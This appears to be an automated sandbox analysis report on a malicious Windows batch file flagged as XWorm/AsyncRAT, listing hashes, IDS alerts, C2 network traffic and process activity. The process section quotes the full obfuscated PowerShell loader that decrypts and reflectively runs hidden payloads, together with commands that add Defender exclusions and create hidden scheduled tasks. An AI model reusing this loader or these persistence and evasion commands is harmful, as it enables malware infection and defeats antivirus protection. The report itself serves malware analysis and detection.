                                                                                                          SHA-512:4BF7B47CF7D2863D75AD880E03BA642B617182F3F1FE3ACD8F96C55415C4CB62D8CB24C94D4D44ED52270E353358D6C37988E65D7BFF562386C9F5A6099AC42A
                                                                                                          Malicious:false
                                                                                                          Preview:No batch label specified to GOTO command...

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:DOS batch file, ASCII text, with very long lines (52021), with CRLF line terminators
                                                                                                          Entropy (8bit):6.066295702056863
                                                                                                          TrID:
                                                                                                            File name:startup_str_466.bat
                                                                                                            File size:388'947 bytes
                                                                                                            MD5:0d686395e9e0766b138059e0333731df
                                                                                                            SHA1:0b52ebd0540f20d542d14cce2167a6d4e219dba5
                                                                                                            SHA256:67db2ef31f607b0ffe1f4e662526a64c356990b827ba31c3a7c4d6c5530a2d76
                                                                                                            SHA512:b79aaa61d2202709265b566328850f83b2d090b2e9b60a36561a03cf1f8a40f67ca6ad9373f2e4480c3c13d6321d6df5a69f657dedb2111ed5d11cf7b3fb669e
                                                                                                            SSDEEP:6144:qXrMg5IoSgfOShUrkui+P9fd7eTbgI6E+/HZNBzucGR4ythl5:q33Sg/6IbHr6F/HDBCykj5
                                                                                                            TLSH:7B84E0271E634D11C5A8E13F7877EE1C8F5097C3EA8DE9288A487558EF67132BE11B90
                                                                                                            File Content Preview:@echo off..WScript.Sleep 2000: CreateObject("WScript.Shell").Run "cmd.exe /c temp.bat", 0, True..Set fso=CreateObject("Scripting.FileSystemObject"): Set txt=fso.CreateTextFile("temp.bat",True): txt.WriteLine("@echo off"): txt.WriteLine("@echo off..%OqYWUX

                                                                                                            File Icon

                                                                                                            Icon Hash:9686878b929a9886

                                                                                                            Network Behavior

                                                                                                            Suricata IDS Alerts

                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2025-01-08T20:07:07.869531+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2450751192.168.2.450003TCP
                                                                                                            2025-01-08T20:07:07.869531+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.185.221.2450751192.168.2.450003TCP
                                                                                                            2025-01-08T20:07:37.901866+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.2450751192.168.2.450003TCP
                                                                                                            2025-01-08T20:07:37.901866+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21147.185.221.2450751192.168.2.450003TCP

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jan 8, 2025 20:05:16.292776108 CET4973180192.168.2.4208.95.112.1
                                                                                                            Jan 8, 2025 20:05:16.297573090 CET8049731208.95.112.1192.168.2.4
                                                                                                            Jan 8, 2025 20:05:16.297646046 CET4973180192.168.2.4208.95.112.1
                                                                                                            Jan 8, 2025 20:05:16.297918081 CET4973180192.168.2.4208.95.112.1
                                                                                                            Jan 8, 2025 20:05:16.302767992 CET8049731208.95.112.1192.168.2.4
                                                                                                            Jan 8, 2025 20:05:16.792489052 CET8049731208.95.112.1192.168.2.4
                                                                                                            Jan 8, 2025 20:05:16.980077982 CET4973180192.168.2.4208.95.112.1
                                                                                                            Jan 8, 2025 20:05:57.133116007 CET8049731208.95.112.1192.168.2.4
                                                                                                            Jan 8, 2025 20:05:57.133199930 CET4973180192.168.2.4208.95.112.1
                                                                                                            Jan 8, 2025 20:06:55.343261003 CET5000350751192.168.2.4147.185.221.24
                                                                                                            Jan 8, 2025 20:06:55.348082066 CET5075150003147.185.221.24192.168.2.4
                                                                                                            Jan 8, 2025 20:06:55.348144054 CET5000350751192.168.2.4147.185.221.24
                                                                                                            Jan 8, 2025 20:06:55.397708893 CET5000350751192.168.2.4147.185.221.24
                                                                                                            Jan 8, 2025 20:06:55.402471066 CET5075150003147.185.221.24192.168.2.4
                                                                                                            Jan 8, 2025 20:06:56.810983896 CET4973180192.168.2.4208.95.112.1
                                                                                                            Jan 8, 2025 20:06:56.815821886 CET8049731208.95.112.1192.168.2.4
                                                                                                            Jan 8, 2025 20:07:07.869530916 CET5075150003147.185.221.24192.168.2.4
                                                                                                            Jan 8, 2025 20:07:07.917762995 CET5000350751192.168.2.4147.185.221.24
                                                                                                            Jan 8, 2025 20:07:37.901865959 CET5075150003147.185.221.24192.168.2.4
                                                                                                            Jan 8, 2025 20:07:37.949054003 CET5000350751192.168.2.4147.185.221.24

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jan 8, 2025 20:05:16.276717901 CET5664553192.168.2.41.1.1.1
                                                                                                            Jan 8, 2025 20:05:16.283512115 CET53566451.1.1.1192.168.2.4
                                                                                                            Jan 8, 2025 20:06:55.322346926 CET5874953192.168.2.41.1.1.1
                                                                                                            Jan 8, 2025 20:06:55.340790987 CET53587491.1.1.1192.168.2.4

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Jan 8, 2025 20:05:16.276717901 CET192.168.2.41.1.1.10x5fc4Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                            Jan 8, 2025 20:06:55.322346926 CET192.168.2.41.1.1.10x93e8Standard query (0)product-hack.gl.at.ply.ggA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Jan 8, 2025 20:05:16.283512115 CET1.1.1.1192.168.2.40x5fc4No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                            Jan 8, 2025 20:06:55.340790987 CET1.1.1.1192.168.2.40x93e8No error (0)product-hack.gl.at.ply.gg147.185.221.24A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • ip-api.com

                                                                                                            HTTP Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.449731208.95.112.1807828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 8, 2025 20:05:16.297918081 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                            Host: ip-api.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 8, 2025 20:05:16.792489052 CET175INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 08 Jan 2025 19:05:16 GMT
                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                            Content-Length: 6
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            X-Ttl: 60
                                                                                                            X-Rl: 44
                                                                                                            Data Raw: 66 61 6c 73 65 0a
                                                                                                            Data Ascii: false


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:14:04:57
                                                                                                            Start date:08/01/2025
                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\startup_str_466.bat" "
                                                                                                            Imagebase:0x7ff6fac90000
                                                                                                            File size:289'792 bytes
                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:1
                                                                                                            Start time:14:04:57
                                                                                                            Start date:08/01/2025
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:2
                                                                                                            Start time:14:04:58
                                                                                                            Start date:08/01/2025
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\Desktop\startup_str_466.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\startup_str_466.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                                                            Imagebase:0x7ff788560000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:3
                                                                                                            Start time:14:05:01
                                                                                                            Start date:08/01/2025
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_533_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_533.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                                            Imagebase:0x7ff788560000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:4
                                                                                                            Start time:14:05:01
                                                                                                            Start date:08/01/2025
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:5
                                                                                                            Start time:14:05:04
                                                                                                            Start date:08/01/2025
                                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_533.vbs"
                                                                                                            Imagebase:0x7ff6638f0000
                                                                                                            File size:170'496 bytes
                                                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:6
                                                                                                            Start time:14:05:08
                                                                                                            Start date:08/01/2025
                                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_533.vbs"
                                                                                                            Imagebase:0x7ff6638f0000
                                                                                                            File size:170'496 bytes
                                                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:7
                                                                                                            Start time:14:05:08
                                                                                                            Start date:08/01/2025
                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_533.bat" "
                                                                                                            Imagebase:0x7ff6fac90000
                                                                                                            File size:289'792 bytes
                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:8
                                                                                                            Start time:14:05:08
                                                                                                            Start date:08/01/2025
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:9
                                                                                                            Start time:14:05:10
                                                                                                            Start date:08/01/2025
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_533.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_533.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                                                            Imagebase:0x7ff788560000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000009.00000002.2963252000.0000013CD83B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000009.00000002.3313915112.0000013CE7954000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000009.00000002.3313915112.0000013CE7954000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000009.00000002.2963252000.0000013CD9346000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000009.00000002.2963252000.0000013CD9346000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000009.00000002.3313915112.0000013CE7ACB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000009.00000002.3313915112.0000013CE7ACB000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:11
                                                                                                            Start time:14:05:15
                                                                                                            Start date:08/01/2025
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                                                                                                            Imagebase:0x7ff788560000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:12
                                                                                                            Start time:14:05:15
                                                                                                            Start date:08/01/2025
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:16
                                                                                                            Start time:14:05:34
                                                                                                            Start date:08/01/2025
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                                                                                                            Imagebase:0x7ff788560000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:17
                                                                                                            Start time:14:05:34
                                                                                                            Start date:08/01/2025
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:18
                                                                                                            Start time:14:05:54
                                                                                                            Start date:08/01/2025
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft Edge.exe'
                                                                                                            Imagebase:0x7ff788560000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:19
                                                                                                            Start time:14:05:54
                                                                                                            Start date:08/01/2025
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:21
                                                                                                            Start time:14:06:21
                                                                                                            Start date:08/01/2025
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft Edge.exe'
                                                                                                            Imagebase:0x7ff788560000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:22
                                                                                                            Start time:14:06:21
                                                                                                            Start date:08/01/2025
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:23
                                                                                                            Start time:14:06:53
                                                                                                            Start date:08/01/2025
                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Roaming\Microsoft Edge.exe"
                                                                                                            Imagebase:0x7ff76f990000
                                                                                                            File size:235'008 bytes
                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:24
                                                                                                            Start time:14:06:53
                                                                                                            Start date:08/01/2025
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:25
                                                                                                            Start time:14:06:55
                                                                                                            Start date:08/01/2025
                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft Edge.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Microsoft Edge.exe"
                                                                                                            Imagebase:0x7ff6cc820000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:26
                                                                                                            Start time:14:06:55
                                                                                                            Start date:08/01/2025
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Has exited:false

                                                                                                            Disassembly

                                                                                                            Reset < >

                                                                                                              Executed Functions

                                                                                                              Function 00007FFD9B975BB3 Relevance: 3.4, Strings: 1, Instructions: 2105COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1919772239.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: J_H;
                                                                                                              • API String ID: 0-1000743649
                                                                                                              • Opcode ID: ceba38a89d4ddb919ab2e0310167cc7f07247870bf64aedecc7baa8b4d0d23c4
                                                                                                              • Instruction ID: 1317abc55234c767e0b8f017f3913c84215242f3a60b80ca92aff3caca0b3ada
                                                                                                              • Opcode Fuzzy Hash: ceba38a89d4ddb919ab2e0310167cc7f07247870bf64aedecc7baa8b4d0d23c4
                                                                                                              • Instruction Fuzzy Hash: 63D25622B1EB8D1FEBA69B6858B55B57BE0EF56210B0901FBD08CC71E3E918AD05C351
                                                                                                              Function 00007FFD9B970ED8 Relevance: .9, Instructions: 872COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1919772239.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b059d0c27e093e9c26cd7c8593f3c79ced2fc7ef7b5b2a3b032085a3c2e78a5e
                                                                                                              • Instruction ID: ebc0bec8019844fd2e7b765e68229bb16833829ddfed41f31c16c6925c18734c
                                                                                                              • Opcode Fuzzy Hash: b059d0c27e093e9c26cd7c8593f3c79ced2fc7ef7b5b2a3b032085a3c2e78a5e
                                                                                                              • Instruction Fuzzy Hash: DD426732B1EA9D1FEBA5DB6C48A45B47BE1EF56324B0A01FBD04DC71E3DA18AD058341
                                                                                                              Function 00007FFD9B9775D9 Relevance: 1.3, Instructions: 1283COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1919772239.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
